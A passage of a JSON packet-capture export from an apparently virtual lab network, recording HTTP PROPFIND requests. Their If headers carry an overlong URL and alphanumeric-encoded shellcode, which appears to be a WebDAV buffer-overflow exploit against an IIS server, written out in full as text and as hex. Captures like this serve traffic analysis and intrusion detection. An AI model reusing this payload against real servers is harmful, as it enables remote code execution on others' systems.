|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "307",
|
||
"ip.id": "0x0000539a",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000dcc3",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "40697",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "40697",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "48",
|
||
"tcp.len": "255",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "3167347328",
|
||
"tcp.nxtseq": "1704",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "3877552171",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00004fcd",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cb:57:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cb:57:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868375",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000418000",
|
||
"tcp.analysis.bytes_in_flight": "1703",
|
||
"tcp.analysis.push_bytes_sent": "1703"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000721000",
|
||
"tcp.time_delta": "0.000006000"
|
||
},
|
||
"tcp.payload": "39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "274",
|
||
"tcp.segment": "275",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1703",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:42:73:77:62:6c:6e:74:44:71:54:6b:57:61:6c:62:79:53:71:78:78:47:67:69:6f:6f:48:65:78:68:41:58:47:4e:71:68:75:48:65:61:67:49:55:4e:64:51:4f:79:69:51:46:5a:68:65:46:51:73:62:6d:66:54:65:63:56:76:4e:5a:6a:72:76:54:7a:58:6e:50:6a:72:55:4c:4b:44:79:66:45:52:4d:64:6c:56:70:6d:75:72:4a:6c:77:45:e4:9d:a4:e4:a5:8e:e6:89:8e:e7:a9:b3:e5:a5:b4:e6:b5:82:e6:b9:92:e6:a9:8e:e4:9d:b7:e5:85:90:e6:8d:b0:e6:8d:b0:e5:85:88:e4:ad:a7:e7:85:b2:e6:a9:b2:c8:82:c8:82:e1:8b:80:e6:a0:83:e7:81:81:e6:85:88:e6:a5:a8:e4:b5:96:e6:85:82:e7:9d:b9:e5:95:a4:e7:9d:85:e4:bd:b1:e7:89:9a:e4:95:b4:e7:a5:83:e6:b9:8b:e5:a9:a9:e5:95:a8:e4:a9:93:e4:95:a4:e6:b5:ae:e6:b1:82:e7:81:8b:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:55:67:45:6c:7a:5a:75:49:57:6a:6e:48:69:61:59:70:74:6a:4c:50:6c:54:4c:48:6b:76:52:56:48:45:55:47:51:78:6f:4b:6f:6a:66:41:47:6e:55:41:73:42:54:53:42:58:71:4f:76:6f:77:48:45:47:58:4e:4e:66:45:77:74:78:59:6b:63:59:6d:57:4d:53:4d:69:45:56:58:68:41:44:61:51:45:4b:49:64:69:6b:6a:67:7a:66:63:5a:e7:85:92:e7:81:91:e4:a5:88:e6:9d:85:e7:8d:84:e6:b1:92:e4:b9:87:e6:91:b1:e6:8d:8c:e5:95:91:e7:89:89:e6:8d:b6:e5:81:ac:e4:89:89:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e7:99:98:e6:9d:aa:e7:a5:ae:e4:95:84:e1:8f:80:e6:a0:83:e4:85:87:e4:a1:99:e4:9d:b6:e6:89:ab:e7:9d:8d:e6:89:af:e6:85:97:e4:b5:90:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/BswblntDqTkWalbySqxxGgiooHexhAXGNqhuHeagIUNdQOyiQFZheFQsbmfTecVvNZjrvTzXnPjrULKDyfERMdlVpmurJlwE<77><45><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/UgElzZuIWjnHiaYptjLPlTLHkvRVHEUGQxoKojfAGnUAsBTSBXqOvowHEGXNNfEwtxYkcYmWMSMiEVXhADaQEKIdikjgzfcZ<63><5A><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "277"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.572234000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.572234000",
|
||
"frame.time_delta": "0.000048000",
|
||
"frame.time_delta_displayed": "0.004351000",
|
||
"frame.time_relative": "16.823174000",
|
||
"frame.number": "284",
|
||
"frame.len": "319",
|
||
"frame.cap_len": "319",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "305",
|
||
"ip.id": "0x000090e1",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00009f7e",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "36237",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "36237",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "49",
|
||
"tcp.len": "253",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "1642556242",
|
||
"tcp.nxtseq": "1702",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "3513254520",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00004022",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cb:5b:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cb:5b:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868379",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000436000",
|
||
"tcp.analysis.bytes_in_flight": "1701",
|
||
"tcp.analysis.push_bytes_sent": "1701"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000656000",
|
||
"tcp.time_delta": "0.000048000"
|
||
},
|
||
"tcp.payload": "6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
